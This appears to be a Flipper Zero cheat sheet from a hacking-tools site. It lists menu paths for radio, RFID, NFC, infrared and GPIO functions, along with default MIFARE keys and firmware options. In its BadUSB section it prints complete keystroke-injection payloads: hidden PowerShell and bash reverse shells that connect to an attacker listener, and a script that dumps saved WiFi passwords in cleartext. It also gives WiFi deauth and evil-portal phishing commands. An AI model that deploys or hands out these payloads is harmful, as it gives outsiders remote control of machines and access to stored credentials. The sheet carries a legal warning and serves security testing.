Quick Reference
Flipper Zero Quick Reference
Hackers Manifest - hackersmanifest.com
Comprehensive quick reference for the Flipper Zero multi-tool - covering Sub-GHz, RFID, NFC, IR, BadUSB, WiFi devboard, and GPIO.
Legal Warning
The Flipper Zero is a powerful multi-tool. Using it against systems you don't own or have explicit permission to test is illegal in most jurisdictions.
- Sub-GHz: Transmitting on certain frequencies may violate FCC/radio regulations
- RFID/NFC: Cloning access cards without authorization is illegal
- BadUSB: Deploying payloads on systems without consent is computer fraud
- WiFi Attacks: Deauth attacks and evil portals are illegal without authorization
- Always obtain written permission before testing
📡 Sub-GHz Attacks
| Read Signal | Sub-GHz → Read |
| Read RAW (unknown protocols) | Sub-GHz → Read RAW |
| Save Signal | [Left] → Save |
| Transmit Signal | Sub-GHz → Saved → Emulate |
| Add Manually | Sub-GHz → Add Manually |
| Frequency Analyzer | Sub-GHz → Frequency Analyzer |
| Delete Signal | Saved → [Select] → Delete |
📻 Sub-GHz Protocols
| CAME | 12-bit fixed | 433.92 MHz |
| CAME TWEE | 54-bit rolling | 433.92 MHz |
| Nice FLO | 12-bit fixed | 433.92 MHz |
| Nice FLOR-S | 52-bit rolling | 433.92 MHz |
| Princeton | 24-bit fixed | 315/433 MHz |
| Linear | 10-bit fixed | 310 MHz (US) |
| Chamberlain | 9-bit fixed | 315/390 MHz |
| Security+ 2.0 | Encrypted rolling | 310-390 MHz |
| KeeLoq | 66-bit rolling | Various |
| Somfy Telis | 56-bit rolling | 433.42 MHz |
🏷️ 125kHz RFID
| Read Card | 125 kHz RFID → Read |
| Write Card | Saved → Write |
| Emulate Card | Saved → Emulate |
| Add Manually | 125 kHz RFID → Add Manually |
Supported Types:
EM4100, HID Prox, Indala, ioProx, AWID, FDX-B, Paradox, Viking, Jablotron, T5577 (clone target)
📱 NFC (13.56 MHz)
| Read Card | NFC → Read |
| Detect Reader | NFC → Detect Reader |
| Dictionary Attack | Extra Actions → MF Classic Dict |
| Write Card | Saved → Write |
| Emulate Card | Saved → Emulate |
Supported Types:
MIFARE Classic 1K/4K, MIFARE Ultralight, NTAG213/215/216, DESFire (limited)
✨ Magic NFC Cards
| Gen1a (Chinese Magic) | Backdoor WUPA, detectable |
| Gen2 (CUID) | Direct block 0 write |
| Gen3 (APDU) | UID+BCC writable, best compat |
| Gen4 (Ultimate) | Shadow mode, GDM/GTU |
| FUID | One-time UID write |
| UFUID | UID writable until locked |
🔑 Common MIFARE Keys
| Factory Default | FF FF FF FF FF FF |
| MAD Key | A0 A1 A2 A3 A4 A5 |
| NDEF Key | D3 F7 D3 F7 D3 F7 |
| Transport | A0 B0 C0 D0 E0 F0 |
| All Zeros | 00 00 00 00 00 00 |
| Infineon | 4D 3A 99 C3 51 DD |
| Nokia | 47 52 4F 4D 49 00 |
📺 Infrared
| Universal Remotes | IR → Universal Remotes |
| Learn Signal | IR → Learn New Remote |
| Save Signal | [Left] → Save |
| Transmit | IR → Saved Remotes |
Built-in Database:
TVs (Samsung, LG, Sony, Vizio), ACs (Carrier, Daikin, Gree), Projectors, Audio
🦆 DuckyScript Commands
| Type text | STRING Hello World |
| Type + Enter | STRINGLN text here |
| Wait (ms) | DELAY 500 |
| Default delay | DEFAULT_DELAY 100 |
| Enter key | ENTER |
| Win+R | GUI r |
| Ctrl+C | CTRL c |
| Alt+F4 | ALT F4 |
| Tab key | TAB |
| Repeat last | REPEAT 5 |
| Comment | REM Comment here |
💀 BadUSB: Windows Reverse Shell
REM Windows Reverse Shell
DELAY 1000
GUI r
DELAY 300
STRING powershell -w hidden
DELAY 100
CTRL SHIFT ENTER
DELAY 800
ALT y
DELAY 500
STRING $client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
ENTER⚠️ Replace ATTACKER_IP with your listener IP
💀 BadUSB: Exfil WiFi Passwords
REM Exfiltrate WiFi Passwords to file
DELAY 1000
GUI r
DELAY 200
STRING powershell -w hidden
CTRL SHIFT ENTER
DELAY 500
ALT y
DELAY 300
STRING (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Out-File $env:TEMP\wifi.txt
ENTER
DELAY 2000
STRING notepad $env:TEMP\wifi.txt
ENTER🍎 BadUSB: macOS Shell
REM macOS Reverse Shell
DELAY 1000
GUI SPACE
DELAY 200
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &
ENTER
DELAY 200
STRING clear && exit
ENTER🐧 BadUSB: Linux Shell
REM Linux Reverse Shell
DELAY 1000
ALT F2
DELAY 300
STRING gnome-terminal
ENTER
DELAY 800
STRING bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &
ENTER
DELAY 200
STRING exit
ENTER🔌 GPIO & iButton
| Read iButton | iButton → Read |
| Write iButton | Saved → Write |
| Emulate iButton | Saved → Emulate |
| USB-UART Bridge | GPIO → USB-UART Bridge |
| GPIO Reader | GPIO → GPIO Reader |
Supported: DS1990A, Cyfral, Metakom, RW1990 (write)
📍 GPIO Pinout
| Pin 1 | +5V | Pin 9 | C1 (USART TX) |
| Pin 2 | A7 (ADC) | Pin 10 | C0 (USART RX) |
| Pin 5 | B3 (SPI MOSI) | Pin 11 | B14 (SPI CLK) |
| Pin 6 | B2 (SPI MISO) | Pin 13 | 3.3V |
| Pin 8 | GND | Pin 18 | 1-Wire (iButton) |
📶 WiFi Devboard (Marauder)
| Launch Marauder | GPIO → ESP → WiFi Marauder |
| Scan APs | scanap |
| Scan Stations | scansta |
| Select Target | select -a [INDEX] |
| Deauth Attack | attack -t deauth |
| Beacon Spam | attack -t beacon -l |
| Rickroll Beacon | attack -t rickroll |
| PMKID Capture | sniff pmkid |
| Stop Attack | stopscan |
🎯 WiFi Attack Techniques
| Evil Portal | Fake captive portal phishing |
| Karma Attack | Auto-respond to probe requests |
| Handshake Capture | sniff pkt → Save PCAP |
| Deauth + Capture | Force reconnect for handshake |
| Probe Sniff | sniff probe |
| Set Channel | channel [1-14] |
⚙️ Firmware Options
| Official | flipperzero.one/update |
| Unleashed | Extended Sub-GHz, no restrictions |
| Momentum | Fork of Xtreme, active dev |
| RogueMaster | Many plugins, games, animations |
📊 Firmware Comparison
| Feature | Official | Unleashed | Momentum |
|---|---|---|---|
| Sub-GHz Range | Limited | Extended | Extended |
| Rolling Codes | No | Yes | Yes |
| Extra Plugins | Few | Many | Most |
| Stability | Best | Great | Good |
| Updates | Slow | Fast | Fast |
📦 Useful Apps
| WiFi Marauder | ESP32 WiFi attacks |
| Evil Portal | Captive portal phishing |
| UART Terminal | Serial debugging |
| SPI Mem Manager | Read/write SPI flash |
| NRF24 Sniffer | Mouse/keyboard attacks |
| Spectrum Analyzer | View RF spectrum |
| TPMS Reader | Tire pressure sensors |
| Pocsag Pager | Pager message decode |
📁 File Management
| USB Mass Storage | Settings → Storage |
| qFlipper (Desktop) | flipperzero.one/update |
| Mobile App | iOS/Android via Bluetooth |
| Sub-GHz Files | SD/subghz/*.sub |
| NFC Files | SD/nfc/*.nfc |
| RFID Files | SD/lfrfid/*.rfid |
| IR Files | SD/infrared/*.ir |
| BadUSB Scripts | SD/badusb/*.txt |
🔧 Troubleshooting
| No SD Card | Format as FAT32, <256GB |
| Sub-GHz No Read | Check antenna, move closer |
| NFC Won't Read | Center card on back exactly |
| BadUSB Fails | Check keyboard layout (US_qwerty) |
| Screen Issues | Settings → LCD → Contrast |
| Battery Drain | Disable Bluetooth when not used |
| DFU Mode | Hold ← + Back during boot |
| Reset to Stock | Flash via qFlipper DFU |
Generated from Hackers Manifest | For authorized security testing only | hackersmanifest.com